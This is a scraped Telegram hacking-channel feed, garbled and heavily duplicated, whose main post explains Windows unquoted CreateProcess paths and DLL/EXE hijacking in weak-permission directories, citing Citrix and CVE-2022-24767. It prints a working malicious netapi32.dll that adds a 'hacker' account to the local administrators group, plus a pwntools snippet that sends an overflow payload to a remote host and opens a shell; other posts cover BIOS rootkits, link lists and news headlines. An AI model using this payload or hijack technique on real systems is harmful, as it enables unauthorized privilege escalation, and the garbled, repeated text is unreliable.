Forwarded from Exploiting Crew (Pr1vAt3)
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAdvanced Hacking: file hijacking caused by directory permissions:
In Windows systems, improper permissions on certain directories or files allow attackers to implant malicious files or execute files in these directories. Since these directories lack effective access control and security review, attackers can exploit vulnerabilities to modify, replace or inject files, or even hijack legitimate processes or services in the system.
Several file hijacking cases to understand the security issues caused by weak permission directories. Before going into specific cases, let's start with the CreateProcess API.
1๏ธโฃ. Unsafe use of CreateProcess
CreateProcessThe API is the basic function used to create a new process in Windows. Its working mechanism is crucial to program startup and path resolution. This API has multiple parameters, among which lpApplicationNameand lpCommandLineare key parameters, which together affect the behavior of process creation, especially how to parse and execute the passed executable file path.
CreateProcessBasic usage
CreateProcessThe prototype is as follows:
๐ฆAdvanced Hacking: file hijacking caused by directory permissions:
In Windows systems, improper permissions on certain directories or files allow attackers to implant malicious files or execute files in these directories. Since these directories lack effective access control and security review, attackers can exploit vulnerabilities to modify, replace or inject files, or even hijack legitimate processes or services in the system.
In Windows systems, there are some typical weak-permission directories, such as C:\Windows\Temp, C:\ProgramDataetc. These directories are usually used to store temporary files. However, many applications and users do not set sufficient permission control for these directories when using them. Attackers can implement file hijacking attacks by placing malicious executable files in these directories, thereby executing code or elevating system permissions.
Several file hijacking cases to understand the security issues caused by weak permission directories. Before going into specific cases, let's start with the CreateProcess API.
1๏ธโฃ. Unsafe use of CreateProcess
CreateProcessThe API is the basic function used to create a new process in Windows. Its working mechanism is crucial to program startup and path resolution. This API has multiple parameters, among which lpApplicationNameand lpCommandLineare key parameters, which together affect the behavior of process creation, especially how to parse and execute the passed executable file path.
CreateProcessBasic usage
CreateProcessThe prototype is as follows:
BOOL CreateProcess(
LPCWSTR lpApplicationName,
LPWSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCWSTR lpCurrentDirectory,
LPSTARTUPINFO lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);
Forwarded from Exploiting Crew (Pr1vAt3)
2๏ธโฃ lpApplicationName: Specifies the path to the application (optional). If NULL, the system will lpCommandLineparse the application path from the first space-delimited item of .
lpCommandLine: Command line arguments passed to the new process. If lpApplicationName, NULLthis argument must include the full path to the application or command name.
lpApplicationNameNULLPath resolution for
When lpApplicationNameis NULL, the system must lpCommandLineparse the executable file path from . This process involves path parsing and processing, which may involve the problem of file names containing spaces.
Path resolution order on the command line:
Let's look at an example from Microsoft's official documentation. Suppose that lpCommandLineit contains something like the following:
3๏ธโฃCreateProcess executes the path without quotes, and lpApplicationNamethe NULLsystem will parse the path in the following order:
c:\program.exe: The system first attempts to parse the path by truncating it from the beginning of the string c:\program.exe.
c:\program files\sub.exe: If the first resolution fails, the system attempts to resolve the path to c:\program files\sub.exe.
c:\program files\sub dir\program.exe: Next, the system tries to resolve the entire path, thinks program.exeit is an executable file name, and tries to execute it.
c:\program files\sub dir\program name.exe: Finally, the system attempts to resolve program nameas an executable file name and appends .exethe extension to it.
lpCommandLine: Command line arguments passed to the new process. If lpApplicationName, NULLthis argument must include the full path to the application or command name.
lpApplicationNameNULLPath resolution for
When lpApplicationNameis NULL, the system must lpCommandLineparse the executable file path from . This process involves path parsing and processing, which may involve the problem of file names containing spaces.
Path resolution order on the command line:
Let's look at an example from Microsoft's official documentation. Suppose that lpCommandLineit contains something like the following:
c:\program files\sub dir\program name
3๏ธโฃCreateProcess executes the path without quotes, and lpApplicationNamethe NULLsystem will parse the path in the following order:
c:\program.exe: The system first attempts to parse the path by truncating it from the beginning of the string c:\program.exe.
c:\program files\sub.exe: If the first resolution fails, the system attempts to resolve the path to c:\program files\sub.exe.
c:\program files\sub dir\program.exe: Next, the system tries to resolve the entire path, thinks program.exeit is an executable file name, and tries to execute it.
c:\program files\sub dir\program name.exe: Finally, the system attempts to resolve program nameas an executable file name and appends .exethe extension to it.
Forwarded from Exploiting Crew (Pr1vAt3)
4๏ธโฃWrite a POC program test:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
int main() {
char *szCmdline = _strdup("c:\\program files\\sub dir\\program name");
// STARTUPINFO PROCESS_INFORMATION
STARTUPINFOA si = {0};
PROCESS_INFORMATION pi = {0};
si.cb = sizeof(si);
// CreateProcessA๏ผANSI๏ผ
if (CreateProcessA(
NULL,
szCmdline,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi
)) {
printf("Process created successfully!\n");
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
} else {
printf("Failed to create process. Error code: %lu\n", GetLastError());
}
free(szCmdline);
return 0;
}
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
int main() {
char *szCmdline = _strdup("c:\\program files\\sub dir\\program name");
// STARTUPINFO PROCESS_INFORMATION
STARTUPINFOA si = {0};
PROCESS_INFORMATION pi = {0};
si.cb = sizeof(si);
// CreateProcessA๏ผANSI๏ผ
if (CreateProcessA(
NULL,
szCmdline,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi
)) {
printf("Process created successfully!\n");
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
} else {
printf("Failed to create process. Error code: %lu\n", GetLastError());
}
free(szCmdline);
return 0;
}
Forwarded from Exploiting Crew (Pr1vAt3)
5๏ธโฃThis test program attempts to start "c:\program files\sub dir\program name" via CreateProcessA, compile and run the program, and monitor it using Process Monitor.
, you can see that Process Monitor monitors the expected behavior of the program. If program.exe exists in the root directory of drive C, then c:\program.exe will be executed.
, you can see that Process Monitor monitors the expected behavior of the program. If program.exe exists in the root directory of drive C, then c:\program.exe will be executed.
Forwarded from Exploiting Crew (Pr1vAt3)
The safe usage of CreateProcess API should be:
If lpApplicationName is set to NULL , the executable file path in lpCommandLine needs to be quoted. Another API function with similar behavior is CreateProcessAsUser.
LPTSTR szCmdline[] = _tcsdup(TEXT("\"C:\\Program Files\\MyApp\" -L -S"));
CreateProcess(NULL, szCmdline, /*...*/);If lpApplicationName is set to NULL , the executable file path in lpCommandLine needs to be quoted. Another API function with similar behavior is CreateProcessAsUser.
Forwarded from Exploiting Crew (Pr1vAt3)
6๏ธโฃ Directory permissions and file hijacking
Through the CreateProcess test program above, we can see that some irregular coding habits may cause the program to behave unexpectedly, which poses a potential security risk. In this case, if the relevant directory is set to weak permissions, such as c:\program files\sub dir\, the directory permissions are improperly set, resulting in an attacker with normal permissions being able to write malicious files in the directory and use file hijacking to achieve the purpose of privilege escalation. Next, let's use several real CVE cases to explore the possible harm caused by file hijacking caused by weak permission directories.
Through the CreateProcess test program above, we can see that some irregular coding habits may cause the program to behave unexpectedly, which poses a potential security risk. In this case, if the relevant directory is set to weak permissions, such as c:\program files\sub dir\, the directory permissions are improperly set, resulting in an attacker with normal permissions being able to write malicious files in the directory and use file hijacking to achieve the purpose of privilege escalation. Next, let's use several real CVE cases to explore the possible harm caused by file hijacking caused by weak permission directories.
Forwarded from Exploiting Crew (Pr1vAt3)
7๏ธโฃCase Analysis
EXE hijacking caused by weak permission directory:
> during the uninstallation of the Citrix program, the CreateProcess API is called to execute the file TrolleyExpress.exe (C:\ProgramData\Citrix\Citrix Workspace 1911\TrolleyExpress.exe). Due to the unquoted path, the program attempts to load C:\ProgramData\Citrix\Citrix.exe. The path C:\ProgramData\Citrix\ has weak permissions. An attacker can write a malicious Citrix.exe to the path and wait for the administrator to uninstall the Citrix Workspace application. The malicious Citrix.exe will be executed to elevate permissions.
EXE hijacking caused by weak permission directory:
> during the uninstallation of the Citrix program, the CreateProcess API is called to execute the file TrolleyExpress.exe (C:\ProgramData\Citrix\Citrix Workspace 1911\TrolleyExpress.exe). Due to the unquoted path, the program attempts to load C:\ProgramData\Citrix\Citrix.exe. The path C:\ProgramData\Citrix\ has weak permissions. An attacker can write a malicious Citrix.exe to the path and wait for the administrator to uninstall the Citrix Workspace application. The malicious Citrix.exe will be executed to elevate permissions.
Forwarded from Exploiting Crew (Pr1vAt3)
8๏ธโฃLocal privilege escalation due to weak system directory permissions:
CVE-2022-24767: The uninstaller for Git for Windows is vulnerable to DLL hijacking when running under the SYSTEM user account
The system user uninstalls the Git for Windows program. By monitoring the program behavior, you will find that the Git uninstaller will try to C:\Windows\Tempload the dll from the directory.
CVE-2022-24767: The uninstaller for Git for Windows is vulnerable to DLL hijacking when running under the SYSTEM user account
The system user uninstalls the Git for Windows program. By monitoring the program behavior, you will find that the Git uninstaller will try to C:\Windows\Tempload the dll from the directory.
Forwarded from Exploiting Crew (Pr1vAt3)
9๏ธโฃ Since ordinary users also have C:\Windows\Tempwrite permissions to the directory, low-privilege attackers can write malicious dlls to C:\Windows\Tempthe directory. When the system user uninstalls the Git program, the malicious dll will run, and the attacker can achieve the purpose of privilege escalation.
Forwarded from Exploiting Crew (Pr1vAt3)
1๏ธโฃ0๏ธโฃwe try to execute malicious code by hijacking netapi32.dll.
Malicious netapi32.dll test code:
After the compilation is complete, put netapi32.dll in the C:\Windows\Temp directory. When the system user uninstalls the Git for Windows program, you will find that the malicious dll is executed and a user hacker is successfully added to the administrator group.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Malicious netapi32.dll test code:
#include<stdio.h>
#include<windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
if (dwReason == DLL_PROCESS_ATTACH){
system("cmd.exe \"/k net user hacker password /add && net localgroup administrators hacker /add && net localgroup administrators\"");
ExitProcess(0);
}
return TRUE;
}
After the compilation is complete, put netapi32.dll in the C:\Windows\Temp directory. When the system user uninstalls the Git for Windows program, you will find that the malicious dll is executed and a user hacker is successfully added to the administrator group.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from DailyCVE
๐ด pnpm, Override Mishap, #CVE-TBD (Critical)
https://dailycve.com/pnpm-override-mishap-cve-tbd-critical/
@DailyCVE
https://dailycve.com/pnpm-override-mishap-cve-tbd-critical/
@DailyCVE
DailyCVE
pnpm, Override Mishap, CVE-TBD (Critical) - DailyCVE
2024-12-11 Platform: pnpm Vulnerability: Override leakage to global cache Severity: Critical Date: What Undercode Says: This article describes a critical [โฆ]
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
โก๏ธ Mozilla Welcomes New Leadership to Drive Innovation and Growth
https://undercodenews.com/mozilla-welcomes-new-leadership-to-drive-innovation-and-growth/
@Undercode_News
https://undercodenews.com/mozilla-welcomes-new-leadership-to-drive-innovation-and-growth/
@Undercode_News
UNDERCODE NEWS
Mozilla Welcomes New Leadership to Drive Innovation and Growth - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from DailyCVE
๐ต Ruby on #Rails, Cross-Site Scripting (XSS), #CVE-2024-XXXX (Low)
https://dailycve.com/ruby-on-rails-cross-site-scripting-xss-cve-2024-xxxx-low/
@Daily_CVE
https://dailycve.com/ruby-on-rails-cross-site-scripting-xss-cve-2024-xxxx-low/
@Daily_CVE
DailyCVE
Ruby on Rails, Cross-Site Scripting (XSS), CVE-2024-XXXX (Low) - DailyCVE
2024-12-11 : A potential Cross-Site Scripting (XSS) vulnerability has been discovered in the `content_security_policy` helper of Ruby on Rails. This [โฆ]
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
๐ค GM Shifts Gears: Focuses In-House Autonomy Over Cruise Robotaxis
https://undercodenews.com/gm-shifts-gears-focuses-in-house-autonomy-over-cruise-robotaxis/
@Undercode_News
https://undercodenews.com/gm-shifts-gears-focuses-in-house-autonomy-over-cruise-robotaxis/
@Undercode_News
UNDERCODE NEWS
GM Shifts Gears: Focuses In-House Autonomy Over Cruise Robotaxis - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from Exploiting Crew (Pr1vAt3)
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ BIOS-level rootkit attack, also known as a persistent BIOS attack, is an exploit in which the BIOS is flashed (updated) with malicious code. A BIOS rootkit is programming that enables remote administration.
The BIOS (basic input/output system) is firmware that resides in memory and runs while a computer boots up. Because the BIOS is stored in memory rather than on the hard disk drive, a BIOS rootkit can survive conventional attempts to get rid of malware, including reformatting or replacing the hard drive.
Originally, the BIOS firmware was hard-coded and read-only. Now, however, manufacturers generally use an erasable format, such as flash memory so that the BIOS can be easily updated remotely. The use of an erasable format that can be updated over the Internet makes updates easier but also leaves the BIOS vulnerable to online attack.
A BIOS attack does not require any vulnerability on the target system -- once an attacker gains administrative-level privileges, he can flash the BIOS over the Internet with malware-laden firmware. On ars technica, Joel Hruska describes one BIOS rootkit attack:
The aforementioned attack consists of dumping the new BIOS into flashrom (a BIOS read/write/modify utility), making the necessary changes, adjusting all of the checksums to ensure the hacked BIOS will verify as authenticโฆ and flashing. Voila! One evil BIOS.
Some researchers fear that a BIOS rootkit poses a special threat for cloud computing environments, in which multiple virtual machines (VM) exist on a single physical system.
Methods of preventing BIOS rootkit attacks include:
Implementing digital signature technology to prevent unauthorized access
Making the BIOS non-writeable
Burning a hardware cryptographic key into the BIOS at manufacture that can be used to verify that the code has not been altered.
If an unauthorized BIOS-level rootkit is detected, the only way to get rid of it is to physically remove and replace the memory where the BIOS resides.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ BIOS-level rootkit attack, also known as a persistent BIOS attack, is an exploit in which the BIOS is flashed (updated) with malicious code. A BIOS rootkit is programming that enables remote administration.
The BIOS (basic input/output system) is firmware that resides in memory and runs while a computer boots up. Because the BIOS is stored in memory rather than on the hard disk drive, a BIOS rootkit can survive conventional attempts to get rid of malware, including reformatting or replacing the hard drive.
Originally, the BIOS firmware was hard-coded and read-only. Now, however, manufacturers generally use an erasable format, such as flash memory so that the BIOS can be easily updated remotely. The use of an erasable format that can be updated over the Internet makes updates easier but also leaves the BIOS vulnerable to online attack.
A BIOS attack does not require any vulnerability on the target system -- once an attacker gains administrative-level privileges, he can flash the BIOS over the Internet with malware-laden firmware. On ars technica, Joel Hruska describes one BIOS rootkit attack:
The aforementioned attack consists of dumping the new BIOS into flashrom (a BIOS read/write/modify utility), making the necessary changes, adjusting all of the checksums to ensure the hacked BIOS will verify as authenticโฆ and flashing. Voila! One evil BIOS.
Some researchers fear that a BIOS rootkit poses a special threat for cloud computing environments, in which multiple virtual machines (VM) exist on a single physical system.
Methods of preventing BIOS rootkit attacks include:
Implementing digital signature technology to prevent unauthorized access
Making the BIOS non-writeable
Burning a hardware cryptographic key into the BIOS at manufacture that can be used to verify that the code has not been altered.
If an unauthorized BIOS-level rootkit is detected, the only way to get rid of it is to physically remove and replace the memory where the BIOS resides.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
โก๏ธ #WhatsApp Beta Gets a New Feature: Forward to Meta #AI
https://undercodenews.com/whatsapp-beta-gets-a-new-feature-forward-to-meta-ai/
@Undercode_News
https://undercodenews.com/whatsapp-beta-gets-a-new-feature-forward-to-meta-ai/
@Undercode_News
UNDERCODE NEWS
WhatsApp Beta Gets a New Feature: Forward to Meta AI - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information andโฆ
Forwarded from Exploiting Crew (Pr1vAt3)
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ ๐๐๐ ๐๐๐ ๐๐๐๐๐๐๐๐ ๐๐๐๐๐๐๐ - ๐๐๐๐๐๐๐
#IoT and embedded devices are often used in critical infrastructure, such as healthcare devices or industrial control systems, which makes the security of these devices even more crucial.
๐ก๐ธ๐๐๐๐ ๐๐๐๐๐๐ ๐๐
Hardware refers to the physical components of a computer system or electronic device, while IoT refers to the network of connected devices that can communicate with each other over the internet.
While there is overlap between these concepts, they refer to different aspects of computer and electronic systems.
๐ ๐๐จ๐ฐ ๐ญ๐จ ๐๐๐ ๐ข๐ง?
๐ A Red Team Guide for a Hardware Penetration Test by Adam Toscher
โญPart 1: https://lnkd.in/eRUtq6Ne
โญPart 2: https://lnkd.in/ezjwNuP6
๐Hardware Hacking Curiosity by ๐บ Adrien Lasalle
https://lnkd.in/eeDp-iq6
๐ IoT Security 101 by V33RU
https://lnkd.in/eZ2QGhdJ
๐ Awesome Hardware Hacking and IoT by Joas A Santos
https://lnkd.in/eyXnbKBv
๐ IoT Village youtube channel
https://lnkd.in/eHEuww7w
๐ UART Hardware Hacking Cheat Sheet by Marcel Rick-Cen
https://lnkd.in/edpyHG2B
๐IoT Pentesting guide by Aditya Gupta and Attify
https://lnkd.in/ekBmcSNd
๐ IoT Security Resources for beginner by Nayana Dhanesh
https://lnkd.in/eAmTvWnj
๐ Firmware analysis on HackTricks
https://lnkd.in/eUvMqtAZ
๐ ๐ ๐๐๐ฅ๐ข๐ง๐ ๐ซ๐๐๐๐ฒ ๐ญ๐จ ๐ญ๐ซ๐๐ข๐ง?
๐ Open Security Training
https://p.ost2.fyi/
๐ Hackaday courses
https://lnkd.in/e3yhaZTB
๐ Intro to IoT pentest on TryHackMe
https://lnkd.in/ewjUM-Tc
๐ ๐๐จ๐ฆ๐ ๐ข๐ง๐ญ๐๐ซ๐๐ฌ๐ญ๐ข๐ง๐ ๐ซ๐๐๐๐ฌ
๐ IOT Security Foundation
https://lnkd.in/ecGudjgn
๐ Awesome IoT Hacks by nebgnahz
https://lnkd.in/eQk4UBrt
๐ Hands on Internet of things hacking by Payatu
https://lnkd.in/eqEEJriu
๐ ๐๐๐๐๐ ๐๐๐ ๐๐๐๐๐๐๐๐๐
๐ Scared by eshard - side-channel analysis framework
https://lnkd.in/eZhb_we3
๐NewAE Technology Inc.โs Github repo
https://lnkd.in/eiuZDCfb
๐Ledger Donjonโs repo by Ledger Security research team
https://lnkd.in/eEhA4FMh
๐IoT-PT an OS for IoT pentest by v33ru
https://lnkd.in/evuB7X_Z
๐ ๐๐ก๐๐ญ ๐๐๐จ๐ฎ๐ญ ๐ญ๐ก๐ ๐ฌ๐ญ๐๐ง๐๐๐ซ๐๐ฌ?
๐ The OWASPยฎ Foundation IoT Project:
https://lnkd.in/ev7TrRf9
๐ NIST Cybersecurity for IOT Program
https://lnkd.in/eq8k8BwG
๐ Hardware Security Module NIST
https://lnkd.in/eXcGvAwV
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ ๐๐๐ ๐๐๐ ๐๐๐๐๐๐๐๐ ๐๐๐๐๐๐๐ - ๐๐๐๐๐๐๐
#IoT and embedded devices are often used in critical infrastructure, such as healthcare devices or industrial control systems, which makes the security of these devices even more crucial.
๐ก๐ธ๐๐๐๐ ๐๐๐๐๐๐ ๐๐
Hardware refers to the physical components of a computer system or electronic device, while IoT refers to the network of connected devices that can communicate with each other over the internet.
While there is overlap between these concepts, they refer to different aspects of computer and electronic systems.
๐ ๐๐จ๐ฐ ๐ญ๐จ ๐๐๐ ๐ข๐ง?
๐ A Red Team Guide for a Hardware Penetration Test by Adam Toscher
โญPart 1: https://lnkd.in/eRUtq6Ne
โญPart 2: https://lnkd.in/ezjwNuP6
๐Hardware Hacking Curiosity by ๐บ Adrien Lasalle
https://lnkd.in/eeDp-iq6
๐ IoT Security 101 by V33RU
https://lnkd.in/eZ2QGhdJ
๐ Awesome Hardware Hacking and IoT by Joas A Santos
https://lnkd.in/eyXnbKBv
๐ IoT Village youtube channel
https://lnkd.in/eHEuww7w
๐ UART Hardware Hacking Cheat Sheet by Marcel Rick-Cen
https://lnkd.in/edpyHG2B
๐IoT Pentesting guide by Aditya Gupta and Attify
https://lnkd.in/ekBmcSNd
๐ IoT Security Resources for beginner by Nayana Dhanesh
https://lnkd.in/eAmTvWnj
๐ Firmware analysis on HackTricks
https://lnkd.in/eUvMqtAZ
๐ ๐ ๐๐๐ฅ๐ข๐ง๐ ๐ซ๐๐๐๐ฒ ๐ญ๐จ ๐ญ๐ซ๐๐ข๐ง?
๐ Open Security Training
https://p.ost2.fyi/
๐ Hackaday courses
https://lnkd.in/e3yhaZTB
๐ Intro to IoT pentest on TryHackMe
https://lnkd.in/ewjUM-Tc
๐ ๐๐จ๐ฆ๐ ๐ข๐ง๐ญ๐๐ซ๐๐ฌ๐ญ๐ข๐ง๐ ๐ซ๐๐๐๐ฌ
๐ IOT Security Foundation
https://lnkd.in/ecGudjgn
๐ Awesome IoT Hacks by nebgnahz
https://lnkd.in/eQk4UBrt
๐ Hands on Internet of things hacking by Payatu
https://lnkd.in/eqEEJriu
๐ ๐๐๐๐๐ ๐๐๐ ๐๐๐๐๐๐๐๐๐
๐ Scared by eshard - side-channel analysis framework
https://lnkd.in/eZhb_we3
๐NewAE Technology Inc.โs Github repo
https://lnkd.in/eiuZDCfb
๐Ledger Donjonโs repo by Ledger Security research team
https://lnkd.in/eEhA4FMh
๐IoT-PT an OS for IoT pentest by v33ru
https://lnkd.in/evuB7X_Z
๐ ๐๐ก๐๐ญ ๐๐๐จ๐ฎ๐ญ ๐ญ๐ก๐ ๐ฌ๐ญ๐๐ง๐๐๐ซ๐๐ฌ?
๐ The OWASPยฎ Foundation IoT Project:
https://lnkd.in/ev7TrRf9
๐ NIST Cybersecurity for IOT Program
https://lnkd.in/eq8k8BwG
๐ Hardware Security Module NIST
https://lnkd.in/eXcGvAwV
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE TESTING
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Support & Share: t.me/undercodecommunity
This is the hub for Ethical Hackers and tech enthusiasts:
ใTopics We Cover:
1๏ธโฃ CVE News & Databases
2๏ธโฃ Hacker & Tech News
3๏ธโฃ Cybersecurity, Hacking, and Secret Methods
๐ Our Mission:
Share your knowledge, collaborate, and grow together in a community designed for innovation and learning.
๐ Join now: bit.ly/joinundercode
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Support & Share: t.me/undercodecommunity
This is the hub for Ethical Hackers and tech enthusiasts:
ใTopics We Cover:
1๏ธโฃ CVE News & Databases
2๏ธโฃ Hacker & Tech News
3๏ธโฃ Cybersecurity, Hacking, and Secret Methods
๐ Our Mission:
Share your knowledge, collaborate, and grow together in a community designed for innovation and learning.
๐ Join now: bit.ly/joinundercode
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from UNDERCODE TESTING
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPopular Exploit development library:
ใPwntools (https://github.com/Gallopsled/pwntools) is a popular CTF (Capture The Flag) framework and exploit development library written in Python. It provides tools and features that streamline the process of writing, testing, and executing exploits, especially for binary exploitation challenges.
Key Features:
- Automated Exploit Scripts**: Easily interact with remote or local binaries.
- ROP (Return Oriented Programming): Simplifies creating ROP chains.
- Tubes: Abstraction for handling sockets, SSH, or processes.
- Assembler/Disassembler: Integrates tools like Capstone and Keystone.
- Debugging Utilities: Interfaces with GDB for dynamic analysis.
- Custom Shellcodes: Generate shellcode tailored to your needs.
Requirements:
Pwntools is compatible with Python 3 and can be installed via pip:
pip install pwntools
Example Usage:
Hereโs a basic example of using Pwntools to exploit a binary:
from pwn import *
# Connect to the remote service
conn = remote('example.com', 1337)
# Send payload
payload = b'A' * 64 + b'\xdeadbeef'
conn.sendline(payload)
# Interact with the shell
conn.interactive()
Check out the repository for detailed documentation and examples.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPopular Exploit development library:
ใPwntools (https://github.com/Gallopsled/pwntools) is a popular CTF (Capture The Flag) framework and exploit development library written in Python. It provides tools and features that streamline the process of writing, testing, and executing exploits, especially for binary exploitation challenges.
Key Features:
- Automated Exploit Scripts**: Easily interact with remote or local binaries.
- ROP (Return Oriented Programming): Simplifies creating ROP chains.
- Tubes: Abstraction for handling sockets, SSH, or processes.
- Assembler/Disassembler: Integrates tools like Capstone and Keystone.
- Debugging Utilities: Interfaces with GDB for dynamic analysis.
- Custom Shellcodes: Generate shellcode tailored to your needs.
Requirements:
Pwntools is compatible with Python 3 and can be installed via pip:
pip install pwntools
Example Usage:
Hereโs a basic example of using Pwntools to exploit a binary:
from pwn import *
# Connect to the remote service
conn = remote('example.com', 1337)
# Send payload
payload = b'A' * 64 + b'\xdeadbeef'
conn.sendline(payload)
# Interact with the shell
conn.interactive()
Check out the repository for detailed documentation and examples.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - Gallopsled/pwntools: CTF framework and exploit development library
CTF framework and exploit development library. Contribute to Gallopsled/pwntools development by creating an account on GitHub.